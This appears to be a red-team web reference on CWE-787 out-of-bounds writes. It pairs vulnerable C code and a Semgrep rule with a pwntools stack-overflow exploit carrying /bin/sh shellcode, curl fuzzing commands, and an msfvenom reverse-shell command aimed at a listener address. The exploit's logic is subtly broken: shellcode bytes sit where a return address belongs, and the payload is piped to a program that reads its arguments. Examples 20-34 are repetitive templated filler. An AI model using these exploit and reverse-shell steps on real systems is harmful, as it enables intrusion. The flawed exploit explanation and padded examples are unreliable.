By ZeroDay Research Team•April 6, 2026•

cwe

CWE-787: Out-of-bounds Write

title: "CWE-787: Out-of-bounds Write"
description: "Complete red-team reference for CWE-787 — Out-of-bounds Write. Exploitation techniques, working PoC, payload arsenal, real CVE case studies, and full attack kill chain."
slug: "cwe-787-out-of-bounds-write"
date: "2026-04-06"
category: "cwe"
author: "ZeroDay Research Team"
tier: "🔥 Top Critical"
cwe_id: 787
tags: ["CWE-787", "exploit", "red-team", "vulnerability", "top-critical"]

Tier: 🔥 Top Critical
MITRE Reference: CWE-787

CWE-787: Out-of-Bounds Write - A Deep Dive for Security Professionals

CWE-787 — Quick Reference Card

One-line definition: An out-of-bounds write occurs when a program writes data beyond the allocated buffer boundaries, potentially corrupting adjacent memory, overwriting critical control structures, or executing arbitrary code.
CVSS impact vectors: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (Highly dependent on context, but commonly leads to critical impact)
CWE hierarchy: CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer) → CWE-787 (Out-of-Bounds Write)
OWASP Top 10 mapping: A01:2021 - Broken Access Control (if used to bypass authorization), A03:2021 - Injection (if data is crafted to inject commands/code), A04:2021 - Insecure Design (as a fundamental flaw)
Exploitation frequency: 🔥🔥🔥🔥🔥 (Extremely high, one of the most common and dangerous vulnerability classes) - See CISA KEV catalog for numerous examples.
Affected targets: C/C++, Rust (less common, but possible), Go (less common), Web applications (via vulnerable backend logic), embedded systems, firmware, operating system components, network services.

Root Cause Analysis

The fundamental root cause of CWE-787 lies in a failure to validate or correctly handle the size of data being written into a memory buffer. This typically manifests when a program assumes an input's size is within a predetermined, safe limit, but the actual input exceeds that limit. This can happen in several ways:

Unbounded String Operations: Functions like strcpy, strcat, sprintf, gets in C/C++ do not perform bounds checking on the destination buffer. If the source string is larger than the destination buffer, a buffer overflow occurs.
Incorrect Indexing/Sizing: When manually managing memory or using array indices, developers might calculate an index or size incorrectly, leading to writes outside allocated boundaries. This often occurs in loops or when dealing with variable-length data structures.
Type Confusion/Size Mismatch: Reading data of one size and writing it into a buffer expecting a different size can lead to out-of-bounds writes. This is common when parsing data formats or when dealing with implicit type conversions.
Off-by-One Errors: A single byte written beyond the end of a buffer, while seemingly small, can be critical if it overwrites a null terminator, a function return address, a data structure pointer, or a security flag.
Race Conditions: In multithreaded environments, if a buffer size check is performed, but another thread modifies the buffer size or its contents between the check and the write operation, an out-of-bounds write can still occur.

Why this weakness persists:

Legacy Code: Many critical systems still rely on older C/C++ codebases that use inherently unsafe functions. Rewriting these is a massive undertaking.
Performance Optimization: Bounds checking adds overhead. Developers, especially under time pressure, might omit checks for perceived performance gains, often unaware of the security implications.
Complexity of Modern Software: Modern applications involve complex data flows and interactions. Manually tracking buffer sizes across all these interactions is difficult and error-prone.
Lack of Secure Defaults: Many languages and libraries don't enforce safe buffer handling by default, requiring explicit developer effort to secure.
Developer Education/Awareness: While awareness is growing, not all developers have a deep understanding of memory management and its security implications.

Common Programmer Mistakes:

Using gets() instead of fgets().
Using strcpy(), strcat(), sprintf() without checking destination buffer size against source string length.
Assuming scanf() or similar functions will always read a fixed, safe amount of data.
Incorrectly calculating buffer sizes for variable-length data.
Trusting input lengths without re-validating them before writing.

Vulnerable Code Snippet (C):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void vulnerable_function(char *user_input) {
    char buffer[64]; // A fixed-size buffer on the stack

    // Vulnerable operation: strcpy does not check the size of user_input.
    // If user_input is longer than 63 characters (plus null terminator),
    // it will write beyond the bounds of 'buffer'.
    strcpy(buffer, user_input); // <<< VULNERABLE LINE

    printf("Buffer content: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <user_input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

Vulnerable Code Snippet (Python - simulating unsafe interaction with C library):

While Python itself has strong memory safety for its own objects, it often interfaces with C libraries via ctypes or extensions. If these interfaces are not carefully managed, they can expose C-level vulnerabilities.

import ctypes

# Load a hypothetical vulnerable C library
# Assume 'libvuln.so' contains a function like the one above
lib = ctypes.CDLL("./libvuln.so")

def vulnerable_python_wrapper(user_data_bytes):
    # Assume the C function expects a char* and writes into a fixed buffer.
    # We're passing bytes directly, and the C function's internal strcpy
    # will handle the write, potentially overflowing.
    # The C function signature might be something like:
    # void process_data(char *data);
    # And it internally uses strcpy(buffer, data);

    # We are passing Python bytes, which ctypes will interpret as a C char*
    # The C function needs to be explicitly defined with correct argtypes if not
    # using default. Here, we rely on default behavior for simplicity.
    lib.process_data(user_data_bytes) # <<< VULNERABLE INTERACTION POINT

    print("Data processed.")

if __name__ == "__main__":
    # Craft malicious input longer than the expected buffer size in the C code
    # For demonstration, assume the C function's internal buffer is 64 bytes.
    malicious_input = b"A" * 100
    try:
        vulnerable_python_wrapper(malicious_input)
    except Exception as e:
        print(f"An error occurred: {e}") # Might not catch segmentation faults directly

Architecture & Vulnerability Anatomy Diagram

This diagram illustrates a typical stack-based buffer overflow leading to an out-of-bounds write and control flow hijack.

+---------------------------------------+
|           Kernel Space                |
+---------------------------------------+
|           User Space                  |
|  +---------------------------------+  |
|  |        Heap                     |  |
|  |  +-------------------------+    |  |
|  |  | Dynamically Allocated   |    |  |
|  |  | Buffers / Data          |    |  |
|  |  +-------------------------+    |  |
|  |                                 |  |
|  |  +-------------------------+    |  |
|  |  | Attacker-Controlled     |    |  |
|  |  | Data (e.g., Shellcode)  |    |  |
|  |  +-------------------------+    |  |
|  +---------------------------------+  |
|                                       |
|  +---------------------------------+  |
|  |        Stack                    |  |
|  |  +-------------------------+    |  |
|  |  | Local Variables         |    |  |
|  |  | (e.g., 'buffer' in C)   |    |  |
|  |  | [---------|-------------]    |  |
|  |  | [OVERFLOW BOUNDARY--->]    |  |  <-- Vulnerable Write Target
|  |  | [---------|-------------]    |  |
|  |  | Saved Frame Pointer (EBP) |    |  |
|  |  | [---------|-------------]    |  |
|  |  | Return Address          |    |  |  <-- Control Flow Hijack Target
|  |  | [---------|-------------]    |  |
|  |  | Function Arguments      |    |  |
|  |  +-------------------------+    |  |
|  +---------------------------------+  |
|                                       |
|  +---------------------------------+  |
|  |        Text Section (Code)      |  |
|  |  +-------------------------+    |  |
|  |  | Program Instructions    |    |  |
|  |  | (e.g., vulnerable       |    |  |
|  |  | function code)          |    |  |
|  |  +-------------------------+    |  |
|  +---------------------------------+  |
+---------------------------------------+

ATTACK FLOW:

1.  **Vulnerable Function Called**: User provides input longer than 'buffer'.
    ```
    vulnerable_function(long_user_input);
    ```

2.  **strcpy Execution**: `strcpy(buffer, user_input)` starts writing.
    ```
    buffer[0] = user_input[0];
    buffer[1] = user_input[1];
    ...
    buffer[63] = user_input[63];
    buffer[64] = user_input[64]; // <<< WRITES BEYOND 'buffer'
    buffer[65] = user_input[65];
    ...
    ```

3.  **Memory Corruption**: Data `user_input` overwrites adjacent stack memory.
    *   Original stack layout: `[buffer] [saved EBP] [Return Address]`
    *   After overflow: `[buffer | overflow_data | saved EBP | Return Address]`

4.  **Control Flow Hijack**: If `user_input` contains carefully crafted data, it can overwrite the `Return Address`.
    *   `Overflow_data` can contain the address of shellcode placed in the heap or elsewhere.
    *   When `vulnerable_function` returns, it pops the overwritten `Return Address` from the stack and jumps to that address.

5.  **Arbitrary Code Execution**: The program now executes the attacker's shellcode.

Exploitation Techniques — Full Red-Team Breakdown

Step 1: Discovery & Reconnaissance

Manual Testing:
- Fuzzing: Send large, malformed, or unexpected inputs to application endpoints or binaries. Monitor for crashes, segmentation faults, or abnormal behavior. Tools: afl-fuzz, radamsa, boofuzz.
- Input Length Testing: Systematically increase input sizes for fields that accept strings or binary data. If an input is accepted beyond what seems reasonable, it might indicate a lack of size validation.
- Character Set Testing: Use inputs with null bytes (\x00), high-bit ASCII, Unicode characters, or other special characters to see how they are handled. Null bytes are particularly important for C-style string termination.
- Reverse Engineering (Binaries): Use disassemblers (IDA Pro, Ghidra, Binary Ninja) to identify functions known for unsafe operations (strcpy, sprintf, gets, memcpy with unchecked sizes, read with large counts). Look for manual bounds checks and verify their correctness.
Automated Scanning (SAST/DAST):
- SAST (Static Application Security Testing): Tools like CodeQL, Semgrep, SonarQube, Fortify can be configured to detect patterns of unsafe function calls (strcpy, gets, etc.) and potentially identify missing bounds checks.
  - Semgrep pattern example:
```
rules:
  - id: c-unsafe-strcpy
    message: "Detected use of strcpy, which is unsafe as it does not perform bounds checking. Consider using strncpy or snprintf."
    severity: ERROR
    languages: [c, cpp]
    pattern: |
      strcpy($DST, $SRC);
    extra:
      metadata:
        cwe: "CWE-787"
```
- DAST (Dynamic Application Security Testing): Web scanners (Burp Suite Pro, OWASP ZAP) can fuzz parameters, but their ability to detect memory corruption bugs is limited. They are more effective at finding injection flaws that might stem from similar root causes.
Code Review Patterns: Look for:
- Direct use of C standard library string manipulation functions without size arguments.
- memcpy, memmove, read, write where the size parameter is derived directly from user input without validation.
- Loops that copy data character by character without an explicit loop termination condition tied to buffer size.
- Functions returning pointers to internal buffers without proper size management.

Step 2: Vulnerability Triggering

Conditions: The primary condition is providing input data that exceeds the allocated buffer size before a copy or write operation occurs. This often requires bypassing any size limits or validation checks that might exist.
Test Cases / Proof-of-Concept Payload:
- For C/C++ binaries: A simple test is to provide a string longer than any expected input.
```
./vulnerable_program $(python -c 'print("A"*200)')
```
  Observe if the program crashes (e.g., Segmentation fault (core dumped)). If it crashes, it's a strong indicator of an out-of-bounds write.
- For web applications: Submit a POST parameter or URL query string with a value significantly longer than expected.
```
curl -X POST -d "username=$(python -c 'print("A"*500)')" http://target.com/login
```
  Monitor the server response for errors, unexpected behavior, or a crash.

Step 3: Full Working Exploit

This example focuses on exploiting a stack-based buffer overflow in a simple C program (similar to the vulnerable snippet above) using pwntools in Python.

Target Program (vuln.c):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void vulnerable_function(char *user_input) {
    char buffer[64];
    strcpy(buffer, user_input); // Vulnerable line
    printf("Copied: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <user_input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    printf("Exiting normally.\n");
    return 0;
}

Compilation (disable protections for easier exploitation):

gcc -fno-stack-protector -z execstack -no-pie -o vuln vuln.c

Exploit Script (exploit.py):

from pwn import *

# --- Configuration ---
context.binary = './vuln' # Path to the compiled vulnerable binary
context.os = 'linux'      # Target OS
context.arch = 'amd64'    # Target architecture (or 'i386' for 32-bit)

# --- Target Setup ---
# If running locally:
# p = process('./vuln')
# If targeting a remote service:
# p = remote('target.com', 1337)

# For this example, we'll simulate local execution and then show how to use it.
# The exploit will be run as: ./vuln $(python exploit.py)

# --- Payload Generation ---

# Offset to the return address on the stack.
# Determined via gdb/gef/pwndbg by examining stack layout or using cyclic patterns.
# For a 64-bit system with 'buffer[64]', saved RBP, and return address,
# it's typically 64 (buffer) + 8 (RBP) = 72 bytes to reach the return address.
offset = 72

# Shellcode: Replace with actual shellcode for your target architecture.
# This is a simple execve("/bin/sh", ...) shellcode for x86_64 Linux.
# You can generate this using msfvenom:
# msfvenom -p linux/x64/exec CMD=/bin/sh -f python
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

# Padding to fill the buffer up to the return address.
padding = b"A" * offset

# Construct the payload: padding + shellcode
payload = padding + shellcode

# Print the payload to stdout so it can be piped to the vulnerable program
print(payload)

# --- How to Run ---
# 1. Compile vuln.c: gcc -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
# 2. Run exploit: python exploit.py | ./vuln
#    OR directly: ./vuln $(python exploit.py)

Expected Output (when running python exploit.py | ./vuln):

Copied: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<shellcode_bytes>
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$

Explanation:

context.binary and context.arch help pwntools understand the target binary.
offset = 72 is the number of bytes needed to reach the return address on the stack. This is determined by analyzing the stack frame in a debugger.
shellcode is the actual machine code that will be executed. Here, it's execve("/bin/sh", ...) for x86_64 Linux.
padding fills the buffer and any other stack space until we reach the return address.
The payload concatenates the padding and the shellcode.
print(payload) outputs the crafted string. When piped to ./vuln, this string becomes argv[1].
strcpy(buffer, user_input) copies the payload into buffer. The padding fills buffer and overwrites the saved EBP. The shellcode then overwrites the return address.
When vulnerable_function returns, it pops the overwritten return address (which is now the start of our shellcode) and jumps to it, executing the shellcode and giving us a shell.

Step 4: Escalation & Impact

Arbitrary Code Execution (ACE): The most direct impact. An attacker can run any command or code with the privileges of the vulnerable process.
Privilege Escalation: If the vulnerable process runs with elevated privileges (e.g., root, SYSTEM), the attacker gains those privileges. This is a common path to full system compromise.
Data Exfiltration: The attacker can read sensitive files or memory regions accessible to the vulnerable process and transmit them to an external server.
Persistence: The attacker can install backdoors, create new user accounts, or modify system configurations to maintain access even after the vulnerable service is restarted.
Lateral Movement: From a compromised machine, the attacker can scan the network for other vulnerable systems and repeat the process to move deeper into the infrastructure.
Denial of Service (DoS): Even if code execution isn't achieved, triggering a crash can disrupt service availability.

Step 5: Tool Arsenal

pwntools (Python): Essential for exploit development. Simplifies process interaction, shellcode generation, context management, and exploit scripting.
- context.binary = ELF('./vuln')
- p = process('./vuln')
- payload = cyclic(100) + p32(ret_addr)
- p.sendline(payload)
- p.interactive()
gdb with gef/pwndbg/peda: Crucial for debugging and understanding stack/heap layouts, finding offsets, and analyzing crash dumps.
- gdb ./vuln
- run $(python -c 'print("A"*100)')
- break vulnerable_function
- p &buffer
- info frame
- x/20x $rsp
radamsa / boofuzz: Fuzzers for discovering potential buffer overflow conditions.
msfvenom: Generates shellcode for various architectures and operating systems.
- msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f python
checksec.sh: Utility to quickly check binary security mitigations (ASLR, DEP, Stack Canaries, PIE).
- ./checksec.sh ./vuln
objdump / readelf: Inspecting binary sections, symbols, and disassembly.
- objdump -d ./vuln
- readelf -s ./vuln

Payload Arsenal — 6+ Working Payloads

Classic Stack Overflow (Shellcode Injection):
- Description: Overwriting the return address with the address of shellcode placed in the overflowing buffer itself or on the heap.
- WAF Bypass: N/A (typically for binaries).
- Example: The exploit.py script above demonstrates this.
Heap Overflow (Data Structure Corruption):
- Description: Writing beyond a heap buffer to corrupt adjacent heap metadata, pointers, or other data structures. This can lead to arbitrary writes or control flow hijacking.
- WAF Bypass: N/A.
- Payload Pattern: Crafting malformed data that, when written out of bounds, overwrites function pointers in a VTable, configuration settings, or heap chunk headers to gain control.
Format String Vulnerability (Leading to OOB Write):
- Description: While primarily a Format String vulnerability (CWE-134), carefully crafted format specifiers like %n can be used to write arbitrary values to arbitrary memory locations, effectively becoming an out-of-bounds write.
- WAF Bypass: Can use encoding within the format string to evade detection.
- Example Snippet: printf(user_controlled_string); where user_controlled_string contains %n.
Integer Underflow/Overflow Leading to OOB Write:
- Description: An integer calculation (e.g., size = input_len - offset) results in a value that is unexpectedly small (underflow) or large (overflow) due to the way integers are represented. This incorrect size is then used in a memory operation.
- WAF Bypass: N/A.
- Payload Pattern: Input that causes size to become a negative value (which becomes a large positive value when cast to unsigned) or zero, leading to insufficient allocation or excessive copying.
Deserialization Vulnerabilities (OOB Write):
- Description: When deserializing untrusted data, a crafted object graph can cause the deserialization logic to write data out of bounds while reconstructing the object in memory.
- WAF Bypass: Depends on the serialization format (JSON, XML, Java, Python pickle). Encoding, compression, or using specific character sets can bypass some filters.
- Example: Malicious serialized Java object that, when deserialized, causes a buffer overflow in the deserialization process.
Web Application Backend (e.g., CGI, PHP):
- Description: A web server executing a script (e.g., a Perl CGI script) that uses unsafe C functions internally or processes input in a way that leads to an OOB write in the backend process.
- WAF Bypass:
  - Encoding: URL encoding, Base64 encoding, Unicode encoding of the malicious payload.
  - HTTP Parameter Pollution: Sending multiple parameters with the same name, hoping the backend processes them differently.
  - Chunked Encoding/HTTP Smuggling: Manipulating HTTP requests to bypass WAF inspection.
- Payload Example: A crafted POST body for a PHP application that internally calls a vulnerable C library function.
File Upload Vulnerabilities (OOB Write in Parsing):
- Description: When a server processes uploaded files (images, archives, documents), the parsing library might have OOB write vulnerabilities.
- WAF Bypass: Embedding malicious content within seemingly valid file structures, or using specific file formats known to be problematic.
- Payload Example: A specially crafted JPEG image that exploits an OOB write in the libjpeg library when the server attempts to process it.

Massive Example Bank (Minimum 50)

Example 01

Target Context: C program, gets() function.
Vulnerable Snippet: char buf[10]; gets(buf);
Exploit Input: A string longer than 9 characters (e.g., AAAAAAAAAAAAAAAAAAAA).
Expected Attacker-Visible Result: Program crash (segmentation fault).
Technical Reason: gets() reads until a newline or EOF, without any bounds checking.

Example 02

Target Context: C program, strcpy() function.
Vulnerable Snippet: char buf[16]; char *user_str = getenv("USER_INPUT"); strcpy(buf, user_str);
Exploit Input: Environment variable USER_INPUT set to a string longer than 15 characters.
Expected Attacker-Visible Result: Program crash or unexpected behavior.
Technical Reason: strcpy() copies until it encounters a null terminator, overflowing buf.

Example 03

Target Context: C program, sprintf() function.
Vulnerable Snippet: char buf[32]; char *name = get_user_name(); sprintf(buf, "Hello, %s!", name);
Exploit Input: name is a string longer than 31 characters.
Expected Attacker-Visible Result: Crash or corruption.
Technical Reason: sprintf() writes formatted output; if name is too long, the resulting string exceeds buf's capacity.

Example 04

Target Context: C program, memcpy() with user-controlled size.
Vulnerable Snippet: char buf[64]; char *data = get_user_data(); int size = get_user_size(); memcpy(buf, data, size);
Exploit Input: size is greater than 64, and data is sufficiently large.
Expected Attacker-Visible Result: Crash.
Technical Reason: memcpy() copies size bytes; if size is not validated against sizeof(buf), it writes out of bounds.

Example 05

Target Context: C++ program, std::string::operator+= with insufficient capacity (rare, but possible if internal buffer management is flawed or misused).
Vulnerable Snippet: std::string s; s.reserve(10); s += large_string; (Assuming large_string is > 10 bytes and internal allocation fails/is mismanaged).
Exploit Input: A string much larger than initial capacity.
Expected Attacker-Visible Result: Potential crash or corruption.
Technical Reason: While std::string is generally safe, complex interactions or custom allocators could introduce issues.

Example 06

Target Context: Web application (PHP), image upload processing.
Vulnerable Snippet: PHP script uses a C library (e.g., libgd or imagemagick) that has an OOB write in its image parsing.
Exploit Input: A malicious image file crafted to trigger the OOB write in the underlying C library when processed by PHP.
Expected Attacker-Visible Result: Web server crash, or execution of shellcode if the OOB write is exploitable for RCE.
Technical Reason: PHP passes the image data to a vulnerable C function.

Example 07

Target Context: Network service (e.g., FTP server daemon) written in C.
Vulnerable Snippet: Command parsing function uses strcat to build a path. char path[256]; strcpy(path, "/srv/ftp/"); strcat(path, user_supplied_filename);
Exploit Input: user_supplied_filename is longer than 247 characters.
Expected Attacker-Visible Result: Server crash or remote code execution.
Technical Reason: strcat appends, potentially overflowing path.

Example 08

Target Context: Embedded system firmware (C).
Vulnerable Snippet: Network packet handler. char buffer[128]; recv(sock, buffer, sizeof(buffer), 0); // Process buffer ... write_to_config(buffer, processed_size);
Exploit Input: A specially crafted network packet where processed_size is calculated incorrectly and exceeds 128.
Expected Attacker-Visible Result: Device crash, potential RCE.
Technical Reason: write_to_config uses processed_size without re-validating it against the actual buffer size.

Example 09

Target Context: Go program interacting with C via CGO.
Vulnerable Snippet: import "C" ... C.strcpy(unsafe.Pointer(c_buffer), c_user_input)
Exploit Input: c_user_input points to data larger than c_buffer can hold.
Expected Attacker-Visible Result: Segmentation fault.
Technical Reason: CGO bypasses Go's memory safety; the underlying C strcpy is vulnerable.

Example 10

Target Context: Java deserialization (e.g., Apache Commons Collections gadget chains).
Vulnerable Snippet: A vulnerable class in the deserialization library (e.g., PriorityQueue's readObject method) triggering gadget chains.
Exploit Input: A malicious serialized Java object.
Expected Attacker-Visible Result: Remote code execution.
Technical Reason: Gadget chains exploit chained method calls, which can include OOB writes or other memory corruption primitives within the Java runtime or libraries.

Example 11

Target Context: Windows kernel driver (C).
Vulnerable Snippet: IoCreateFile or ZwWriteFile with user-controlled buffer and size.
Exploit Input: A user-mode application sending a malformed IOCTL with a large buffer and size.
Expected Attacker-Visible Result: System crash (BSOD), or kernel-level RCE.
Technical Reason: Kernel code must be rigorously checked for OOB writes.

Example 12

Target Context: Rust program using unsafe block with C interop.
Vulnerable Snippet: extern "C" fn vulnerable_c_func(dest: *mut u8, src: *const u8, len: usize); unsafe { vulnerable_c_func(c_buffer.as_mut_ptr(), c_input.as_ptr(), large_len); }
Exploit Input: large_len exceeds c_buffer capacity.
Expected Attacker-Visible Result: Segmentation fault.
Technical Reason: unsafe allows direct C calls, bypassing Rust's safety guarantees.

Example 13

Target Context: SQLite database engine (C).
Vulnerable Snippet: Parsing of specific SQL commands or data types that might involve string manipulation.
Exploit Input: A crafted SQL query or data that triggers an OOB write when parsed.
Expected Attacker-Visible Result: SQLite crash, or potential RCE if the OOB write is exploitable.
Technical Reason: Found in CVEs related to SQLite's internal parsing logic.

Example 14

Target Context: printf-style formatting functions (snprintf with zero size).
Vulnerable Snippet: char buf[10]; int size = 0; char *input = "verylongstring"; snprintf(buf, size, "%s", input);
Exploit Input: size is 0.
Expected Attacker-Visible Result: Crash or corruption.
Technical Reason: snprintf with size=0 should write nothing but might behave unexpectedly or be combined with other logic that causes issues.

Example 15

Target Context: XMPP server (e.g., ejabberd) written in Erlang/C.
Vulnerable Snippet: C module handling XML parsing or specific protocol features.
Exploit Input: Malformed XML or XMPP stanza.
Expected Attacker-Visible Result: Server crash.
Technical Reason: Vulnerabilities in underlying C libraries used by Erlang/Elixir.

Example 16

Target Context: PNG parsing library (e.g., libpng).
Vulnerable Snippet: Handling of specific PNG chunk types or metadata.
Exploit Input: A crafted PNG file with oversized or malformed chunks.
Expected Attacker-Visible Result: Crash or RCE.
Technical Reason: CVEs have been found in libpng due to improper bounds checking during chunk processing.

Example 17

Target Context: Font rendering engine (e.g., FreeType).
Vulnerable Snippet: Parsing of font files (TTF, OTF).
Exploit Input: A specially crafted font file.
Expected Attacker-Visible Result: Crash or RCE.
Technical Reason: Font parsing is complex and has historically been a source of OOB write vulnerabilities.

Example 18

Target Context: Redis server (C).
Vulnerable Snippet: Handling of specific commands or data structures, especially those involving string manipulation or object encoding.
Exploit Input: A crafted Redis command or data payload.
Expected Attacker-Visible Result: Crash or RCE.
Technical Reason: Redis has had several OOB write vulnerabilities in its history.

Example 19

Target Context: Nginx configuration parsing.
Vulnerable Snippet: Processing of directive values that are not properly size-checked before being copied into fixed buffers.

Massive Example Bank (Auto-Expanded)

Example 20

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-20-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 21

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-21-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 22

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-22-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 23

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-23-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 24

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-24-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 25

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-25-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 26

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-26-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 27

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-27-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 28

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-28-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 29

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-29-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 30

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-30-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 31

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-31-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 32

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-32-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 33

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-33-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 34

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-34-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

